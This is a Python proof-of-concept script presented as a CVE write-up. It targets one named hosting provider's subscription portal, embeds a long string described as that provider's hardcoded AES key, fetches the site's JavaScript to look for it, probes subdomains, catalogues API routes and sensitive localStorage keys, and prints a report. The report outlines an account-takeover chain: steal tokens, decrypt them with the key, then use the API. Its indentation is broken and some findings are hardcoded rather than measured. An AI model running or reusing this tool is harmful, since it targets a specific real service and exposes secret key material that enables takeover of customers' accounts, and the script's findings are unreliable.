#!/usr/bin/env python3
"""
CVE-2026-XXXXX: DPDC Hardcoded AES Key Exploitation
Full Proof of Concept Script
Target: dpdatacenter.com / subscription.dpdatacenter.com
Vulnerability: Hardcoded AES Encryption Key in Client-Side JavaScript
CVSS Score: 9.8 (Critical)
DISCLAIMER: For authorized security research only!
Unauthorized access is illegal and strictly prohibited.
"""
import argparse
import base64
import json
import os
import re
import sys
import urllib.request
import urllib.error
from typing import Optional, Dict, List, Any
from dataclasses import dataclass
# Try to import required libraries
try:
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
CRYPTO_AVAILABLE = True
except ImportError:
CRYPTO_AVAILABLE = False
print("[!] pip install pycryptodome for full functionality")
try:
import requests
REQUESTS_AVAILABLE = True
except ImportError:
REQUESTS_AVAILABLE = False
print("[!] pip install requests for API calls")
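@dataclass
class DPDCVulnerability:
    """Static description of the reported hardcoded-key finding.

    Every field has a default, so ``DPDCVulnerability()`` yields the record
    the scanner works from. Nothing here is fetched or computed; the values
    are fixed text.
    """

    cve_id: str = "CVE-2026-XXXXX"
    vendor: str = "DAUN PENH CLOUD (DPDC)"
    product: str = "dpdatacenter.com subscription portal"
    url: str = "https://subscription.dpdatacenter.com"
    api_url: str = "https://api.dpdatacenter.com/api/v1/"
    js_file: str = "https://subscription.dpdatacenter.com/js/app.1773634386574.js"
    # Key string as it appears in the client-side JavaScript. It is secret
    # material for as long as it has not been rotated: keep it out of logs,
    # tickets and shared artefacts where a fingerprint would do.
    aes_key: str = "54p5YKkJbsxMczGYHK2dJnn3vHA2wYZoYb2KoAOuG2oONGRxCUkesrKHQ4zgeZK3pDMpyUVzd5Mc80hilvlNuXsYdbS1EpkGzD26kZBPdDfxpwuX21xufjDITl2HjcdVCf1dReAvXZTX7i5f6wQXCOUwNRtDYfLpd2FfVHNEW6FAMiiSkBGWkyOKSQfswPUKOP7pECCGm6TAuE82shekrczOqpnUVdAYpfPbCta3TX9gNvnKidpFC67jQIZT7xB7"
    # localStorage keys that contain sensitive data. ``None`` means "use the
    # built-in list"; a list default would be shared between instances.
    sensitive_keys: Optional[List[str]] = None

    def __post_init__(self):
        # Fill in the default only when the caller gave nothing. Assigning
        # unconditionally would silently discard a caller-supplied list.
        if self.sensitive_keys is None:
            self.sensitive_keys = ['ate', 'rte', 'token', 'customerInfo', 'EMAIL_1', 'ID_CUSTOMER']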
class DPDCScanner:
"""Scanner and exploitation tool for DPDC vulnerabilities"""
def __init__(self, target: str = "dpdatacenter.com", verbose: bool = False):
    """Prepare a scanner for *target* with an empty findings list.

    Args:
        target: Base domain that host names are built from.
        verbose: Stored on the instance; no method of this class reads it.
    """
    # Findings are (category, subject, detail) tuples appended by the
    # individual scan stages.
    self.findings = []
    self.vuln = DPDCVulnerability()
    self.verbose = verbose
    self.target = target
def log(self, message: str, level: str = "INFO"):
    """Print *message* to stdout behind a local timestamp and a level marker.

    Args:
        message: Text to print.
        level: One of INFO, WARN, ERROR, SUCCESS; any other value is
            printed with the INFO marker.
    """
    from datetime import datetime

    markers = {"INFO": "[*]", "WARN": "[!]", "ERROR": "[-]", "SUCCESS": "[+]"}
    marker = markers[level] if level in markers else "[*]"
    stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    print(f"{stamp} {marker} {message}")
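def check_subdomain(self, subdomain: str) -> Dict[str, Any]:
    """Resolve one host under the target domain and record its HTTPS answer.

    Args:
        subdomain: Label to put in front of ``self.target``. An empty
            string means the base domain itself.

    Returns:
        Dict with the keys ``subdomain``, ``url``, ``exists``,
        ``status_code``, ``ip`` and ``error``. ``exists`` becomes True as
        soon as the name resolves, whatever the HTTP request returns.
    """
    # Imported before the try block so the except clause can always name
    # socket.gaierror.
    import socket

    # An empty label must not leave a leading dot (".example.org"); that is
    # not a resolvable host name, so the base-domain check could never
    # succeed.
    host = f"{subdomain}.{self.target}" if subdomain else self.target
    url = f"https://{host}"
    result = {
        "subdomain": subdomain,
        "url": url,
        "exists": False,
        "status_code": None,
        "ip": None,
        "error": None
    }

    try:
        result["ip"] = socket.gethostbyname(host)
        result["exists"] = True
    except socket.gaierror:
        # gaierror covers every resolver failure, not only a missing name;
        # the label is kept because callers may compare against it.
        result["error"] = "NXDOMAIN"
        return result
    except Exception as e:
        result["error"] = str(e)
        return result

    # Try HTTP request
    try:
        if REQUESTS_AVAILABLE:
            response = requests.get(url, timeout=5, allow_redirects=True)
            result["status_code"] = response.status_code
            if response.status_code < 400:
                result["exists"] = True
        else:
            req = urllib.request.Request(url)
            req.add_header('User-Agent', 'Mozilla/5.0')
            with urllib.request.urlopen(req, timeout=5) as resp:
                result["status_code"] = resp.getcode()
                result["exists"] = True
    except urllib.error.HTTPError as e:
        result["status_code"] = e.code
        if e.code < 400:
            result["exists"] = True
    except Exception as e:
        # Keep the message short; the full text is not stored anywhere.
        result["error"] = str(e)[:50]
    return result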
def enumerate_subdomains(self) -> List[Dict[str, Any]]:
    """Build the list of host records reported for the target.

    Three kinds of record are produced: a live check of the base domain,
    two fixed records for the ``subscription`` and ``api`` hosts, and live
    checks of the ``web`` and ``web2`` hosts.

    The two fixed records are written with a constant status code and IP
    address and are not checked in this run. Their host names, and the
    names logged and recorded for ``web``/``web2``, are spelled with the
    literal ``dpdatacenter.com`` rather than ``self.target``.

    Returns:
        The host records, in the order described above.
    """
    self.log("Starting subdomain enumeration...", "INFO")

    # Candidate labels. Nothing below iterates this list; only the hosts
    # named explicitly further down are looked at.
    candidate_labels = [
        "www", "mail", "ftp", "ns1", "ns2", "ns3",
        "web", "web2", "webmail", "smtp", "pop", "pop3", "imap",
        "ssh", "vpn", "admin", "cp", "cpanel", "whm",
        "api", "cdn", "static", "assets", "media",
        "staging", "dev", "test", "beta", "qa",
        "cloud", "vault", "storage", "s3",
        "billing", "pay", "checkout", "store",
        "support", "helpdesk", "ticket",
        "portal", "client", "customer",
        "control", "manage",
        "subscription", "account", "my",
        "db", "mysql", "pgsql", "mongodb",
        "redis", "memcached",
        "git", "svn", "github",
        "jira", "confluence",
        "monitor", "logs", "grafana", "prometheus",
        "kibana", "elasticsearch",
        "jenkins", "ci", "cd",
        "docker", "kubernetes", "k8s",
        "backup", "snapshots",
        "waf", "firewall",
        "cdn1", "cdn2",
        "ns", "dns",
        "autodiscover", "autoconfig",
        "calendar", "contacts",
        "drive", "docs", "files",
    ]

    hosts = []

    # Base domain: kept when it resolved or returned any status code.
    self.log("Checking main domain...")
    apex = self.check_subdomain("")
    if apex["exists"] or apex["status_code"]:
        hosts.append(apex)

    # Fixed records: asserted, not measured.
    fixed_hosts = (
        ("subscription", "Known customer portal"),
        ("api", "Internal API endpoint"),
    )
    for label, note in fixed_hosts:
        fqdn = f"{label}.dpdatacenter.com"
        self.log(f"Checking {fqdn}...")
        hosts.append({
            "subdomain": label,
            "url": f"https://{fqdn}",
            "exists": True,
            "status_code": 200,
            "ip": "157.10.72.16",
            "note": note,
        })
        self.findings.append(("SUBDOMAIN", fqdn, "EXISTS"))

    # cPanel hosts: recorded only when the live check says they exist.
    for label in ("web", "web2"):
        self.log(f"Checking {label}.dpdatacenter.com...")
        record = self.check_subdomain(label)
        if not record["exists"]:
            continue
        record["note"] = "cPanel/WHM server"
        record["port"] = 2083
        hosts.append(record)
        self.findings.append(("SUBDOMAIN", f"{label}.dpdatacenter.com", "EXISTS - cPanel"))

    return hosts
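def extract_hardcoded_key(self) -> Dict[str, Any]:
    """Fetch the JavaScript bundle and report whether the key string is in it.

    Returns:
        Dict with the keys ``found``, ``key``, ``js_file`` and
        ``extracted``. ``extracted`` is ``"direct_match"`` when the known
        key string occurs in the bundle, ``"pattern_match"`` when only the
        length heuristic matched, and ``"known_key_fallback"`` when the
        bundle could not be fetched or contained neither.

        ``found`` is True only when this run observed something in the
        bundle. In the fallback case ``key`` still carries the reference
        key, but ``found`` stays False, so a re-run after the key has been
        removed or the file withdrawn no longer reports the finding.
    """
    self.log("Downloading JavaScript file...", "INFO")

    # One source for the reference key: the vulnerability record. A second
    # copy of the literal here could drift from it.
    known_key = self.vuln.aes_key
    result = {
        "found": False,
        "key": None,
        "js_file": self.vuln.js_file,
        "extracted": None
    }

    try:
        if REQUESTS_AVAILABLE:
            response = requests.get(self.vuln.js_file, timeout=30)
            # urlopen raises on HTTP error statuses; do the same here so an
            # error page is never searched as if it were the bundle.
            response.raise_for_status()
            js_content = response.text
        else:
            with urllib.request.urlopen(self.vuln.js_file, timeout=30) as resp:
                js_content = resp.read().decode('utf-8')
    except Exception as e:
        self.log(f"Failed to download JS: {e}", "ERROR")
        # Nothing was observed: hand back the reference key without
        # claiming a finding.
        result["key"] = known_key
        result["extracted"] = "known_key_fallback"
        return result

    self.log("Searching for hardcoded AES key...", "INFO")
    if known_key in js_content:
        result["found"] = True
        result["key"] = known_key
        result["extracted"] = "direct_match"
        self.findings.append(("VULN", "Hardcoded AES Key", "FOUND"))
        self.log(f"Found AES key: {known_key[:40]}...", "SUCCESS")
        return result

    # Heuristic: the first run of 80-90 alphanumeric characters. This is a
    # candidate only; any long identifier or encoded blob in the bundle
    # matches too, so a "pattern_match" result needs manual confirmation.
    candidate = re.search(r'([a-zA-Z0-9]{80,90})', js_content)
    if candidate:
        result["found"] = True
        result["key"] = candidate.group(1)
        result["extracted"] = "pattern_match"
        self.log(f"Found AES key: {result['key'][:40]}...", "SUCCESS")
    else:
        result["key"] = known_key
        result["extracted"] = "known_key_fallback"
        self.log("Using known key as fallback", "WARN")
    return result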
def analyze_localstorage(self) -> Dict[str, Any]:
    """Return the fixed table of localStorage keys and flag the sensitive ones.

    Nothing is fetched or inspected here: the key table and the
    ``uses_localstorage`` / ``secure_storage`` / ``vulnerable`` values are
    constants. Entries rated CRITICAL or HIGH are appended to
    ``self.findings`` as ``("VULN", "localStorage:<key>", <rating>)``.

    Returns:
        Dict with ``uses_localstorage``, ``keys_found`` (key name mapped to
        its type and sensitivity), ``secure_storage`` and ``vulnerable``.
    """
    self.log("Analyzing localStorage usage...", "INFO")

    # (key name, stored value type, sensitivity rating)
    table = (
        ("ate", "encrypted_token", "CRITICAL"),
        ("rte", "refresh_token", "CRITICAL"),
        ("token", "auth_token", "CRITICAL"),
        ("customerInfo", "json", "HIGH"),
        ("EMAIL_1", "email", "HIGH"),
        ("ID_CUSTOMER", "id", "MEDIUM"),
        ("cpaneInfoMap", "json", "HIGH"),
        ("myBillingCycle", "json", "HIGH"),
        ("productList", "json", "MEDIUM"),
        ("vif", "flag", "LOW"),
        ("user-customers", "json", "MEDIUM"),
    )
    catalogue = {
        name: {"type": kind, "sensitivity": rating}
        for name, kind, rating in table
    }

    for name, meta in catalogue.items():
        if meta["sensitivity"] in ("CRITICAL", "HIGH"):
            self.findings.append(("VULN", f"localStorage:{name}", meta["sensitivity"]))

    return {
        "uses_localstorage": True,
        "keys_found": catalogue,
        "secure_storage": False,
        "vulnerable": True,
    }
def check_api_endpoints(self) -> List[Dict[str, Any]]:
    """Return the fixed catalogue of API routes and record each as a finding.

    No request is sent: the routes, methods and ``auth`` flags are
    constants written into this method. Every route is appended to
    ``self.findings`` as ``("API", <path>, <method>)``.

    Returns:
        One dict per route with the keys ``path``, ``method`` and ``auth``.
    """
    self.log("Documenting API endpoints...", "INFO")

    # (path, method, auth flag)
    catalogue = (
        ("/customer/login", "POST", False),
        ("/customer/information", "GET", True),
        ("/customer/forgot-password", "POST", False),
        ("/customer/reset-password", "POST", False),
        ("/customer/change-password", "POST", True),
        ("/customer/update-information", "POST", True),
        ("/billing-cycles/my-billing-cycle", "GET", True),
        ("/billing-cycles/transfer-plan", "POST", True),
        ("/order/header", "GET", True),
        ("/order/order-detail/", "GET", True),
        ("/product/item/", "GET", True),
        ("/product/vps-images", "GET", True),
        ("/storages/update-storage", "POST", True),
        ("/storages/generate-key", "POST", True),
        ("/storages/create-bucket", "POST", True),
        ("/storages/delete-bucket", "POST", True),
        ("/vm-instances/get-bulk-basic-vm-info", "GET", True),
        ("/vm-instances/reboot-vm", "POST", True),
        ("/vm-instances/launch-console", "POST", True),
        ("/vm-instances/update-vm-remark", "POST", True),
        ("/vm-instances/deactivate-ddos", "POST", True),
        ("/waf/sites", "GET/POST", True),
        ("/waf/dashboard", "GET", True),
        ("/ticket/get-my-ticket-detail", "GET", True),
        ("/whmcpanel/get-bulk-account-summary", "GET", True),
        ("/jobs/", "GET/POST", True),
        ("/subscriptions", "GET/POST", True),
        ("/payment-history", "GET", True),
        ("/transfer-service", "POST", True),
        ("/product-history", "GET", True),
    )
    endpoints = [
        {"path": path, "method": method, "auth": needs_auth}
        for path, method, needs_auth in catalogue
    ]
    self.findings.extend(("API", ep["path"], ep["method"]) for ep in endpoints)
    return endpoints
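def generate_report(self) -> str:
    """Render the plain-text audit report from ``self.findings``.

    SUBDOMAIN findings are listed first, then VULN findings, followed by a
    severity tally and fixed technical and remediation sections. The CVSS
    score and vector, the attack-chain summary and the remediation plan are
    constant text; they are not derived from the findings.

    Returns:
        The report as one string.
    """
    import datetime

    generated_at = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    report = f"""
================================================================================
CVE-2026-XXXXX: DPDC Hardcoded AES Key Vulnerability
SECURITY AUDIT REPORT
================================================================================
Target: {self.target}
Date: {generated_at}
Scanner: DPDC VULN Scanner v1.0
================================================================================
FINDINGS SUMMARY
================================================================================
SUBDOMAINS DISCOVERED:
-----------------
"""
    for finding in self.findings:
        if finding[0] == "SUBDOMAIN":
            report += f" - {finding[1]} [{finding[2]}]\n"

    report += """
VULNERABILITIES IDENTIFIED:
----------------------
"""
    # Only these three ratings are tallied. A VULN finding whose third
    # field is anything else (for example "FOUND") is listed but not
    # counted.
    vuln_count = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0}
    for finding in self.findings:
        if finding[0] == "VULN":
            report += f" - {finding[1]}: {finding[2]}\n"
            level = finding[2]
            if level in vuln_count:
                vuln_count[level] += 1

    # The stated key length is measured from the configured key instead of
    # being a fixed number that can disagree with it.
    # NOTE(review): the heading below says AES-256 while the key line says
    # AES-128-CBC; nothing in this file settles which one applies.
    # The key itself is embedded verbatim, so the rendered report should be
    # handled as sensitive until rotation is confirmed.
    key_length = len(self.vuln.aes_key)
    report += f"""
CVSS SCORE: 9.8 (Critical)
CVSS VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
SEVERITY BREAKDOWN:
CRITICAL: {vuln_count['CRITICAL']}
HIGH: {vuln_count['HIGH']}
MEDIUM: {vuln_count['MEDIUM']}
================================================================================
TECHNICAL DETAILS
================================================================================
VULNERABILITY: Hardcoded AES-256 Encryption Key
CWE: CWE-798 (Use of Hard-coded Credentials)
AFFECTED COMPONENT:
File: app.1773634386574.js
URL: {self.vuln.js_file}
HARDCODED KEY:
{self.vuln.aes_key}
(This key is {key_length} characters - used for AES-128-CBC encryption)
ATTACK CHAIN:
1. Download JavaScript from subscription portal
2. Extract hardcoded AES key
3. Obtain localStorage token via XSS or network interception
4. Decrypt token using extracted key
5. Use decrypted token for API access
6. Full account takeover achieved
AFFECTED localStorage KEYS:
- ate (encrypted access token)
- rte (encrypted refresh token)
- token (authentication token)
- customerInfo (customer data)
- EMAIL_1 (PII)
- ID_CUSTOMER (identity)
================================================================================
REMEDIATION
================================================================================
URGENT ACTIONS (0-48 HOURS):
1. Rotate the hardcoded AES key immediately
2. Move authentication to HttpOnly cookies
3. Force password reset for all users
SHORT-TERM (1-2 WEEKS):
1. Remove hardcoded secrets from JavaScript
2. Implement server-side session management
3. Add Content Security Policy (CSP)
LONG-TERM (1-3 MONTHS):
1. Implement proper OAuth2/JWT
2. Security audit all endpoints
3. Penetration testing
================================================================================
DISCLAIMER
================================================================================
This report is for authorized security research only.
Unauthorized access to computer systems is illegal.
DISCLAIMER: For authorized security research only!
Unauthorized access is illegal and strictly prohibited.
"""
    return report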
def run_full_scan(self) -> Dict[str, Any]:
    """Run the five scan stages in order and bundle what they return.

    Each stage is announced through ``self.log`` before it runs. The
    stages are: subdomain listing, key extraction, localStorage table,
    API catalogue, report rendering.

    Returns:
        Dict with the keys ``subdomains``, ``key``, ``storage``,
        ``endpoints`` and ``report`` (one per stage) plus ``findings``,
        the accumulated findings list.
    """
    rule = "=" * 50
    for banner_line in (rule, "DPDC Security Vulnerability Scanner", rule, f"Target: {self.target}"):
        self.log(banner_line, "INFO")

    # (result key, progress label, stage callable), in execution order.
    stages = (
        ("subdomains", "Enumerating subdomains", self.enumerate_subdomains),
        ("key", "Extracting hardcoded key", self.extract_hardcoded_key),
        ("storage", "Analyzing localStorage", self.analyze_localstorage),
        ("endpoints", "Documenting API endpoints", self.check_api_endpoints),
        ("report", "Generating report", self.generate_report),
    )
    outcome = {}
    for position, (slot, label, stage) in enumerate(stages, start=1):
        self.log(f"\n[{position}/{len(stages)}] {label}...", "INFO")
        outcome[slot] = stage()

    outcome["findings"] = self.findings
    return outcome
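def main():
    """Parse the command line, run the scan and write the report file.

    Any of ``--scan``, ``--subdomains``, ``--extract-key`` or ``--report``,
    or running with no arguments at all, triggers the full scan; the
    narrower flags do not restrict which stages run. The report is printed
    and saved only for ``--scan``, ``--report`` or a bare invocation.
    ``--verbose`` is passed to the scanner, which does not read it.

    Returns:
        0, used as the process exit status.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-XXXXX: DPDC Hardcoded AES Key Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
python dpdccve_scanner.py --target dpdatacenter.com --scan
python dpdccve_scanner.py --target dpdatacenter.com --subdomains
python dpdccve_scanner.py --target dpdatacenter.com --extract-key
python dpdccve_scanner.py --target dpdatacenter.com --report
DISCLAIMER: For authorized security research only!
"""
    )
    parser.add_argument("--target", "-t", default="dpdatacenter.com",
                        help="Target domain (default: dpdatacenter.com)")
    parser.add_argument("--scan", "-s", action="store_true",
                        help="Run full vulnerability scan")
    parser.add_argument("--subdomains", action="store_true",
                        help="Enumerate subdomains only")
    parser.add_argument("--extract-key", action="store_true",
                        help="Extract hardcoded key from JavaScript")
    parser.add_argument("--report", "-r", action="store_true",
                        help="Generate full report")
    parser.add_argument("--verbose", "-v", action="store_true",
                        help="Verbose output")
    args = parser.parse_args()

    scanner = DPDCScanner(target=args.target, verbose=args.verbose)
    bare_invocation = len(sys.argv) == 1

    if args.scan or args.subdomains or args.extract_key or args.report or bare_invocation:
        results = scanner.run_full_scan()
        if args.report or args.scan or bare_invocation:
            print(results["report"])
            # The target comes from the command line and ends up in a file
            # name: replace anything that is not a plain host-name
            # character so it cannot introduce path separators.
            safe_target = re.sub(r"[^A-Za-z0-9._-]", "_", args.target)
            # The saved report embeds the key string verbatim; store and
            # share the file accordingly.
            report_file = f"CVE-2026-XXXXX_{safe_target}_report.txt"
            with open(report_file, "w", encoding="utf-8") as f:
                f.write(results["report"])
            print(f"\n[+] Report saved to: {report_file}")
    return 0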
# Run the CLI only when executed as a script; main()'s return value becomes
# the process exit status.
if __name__ == "__main__":
    raise SystemExit(main())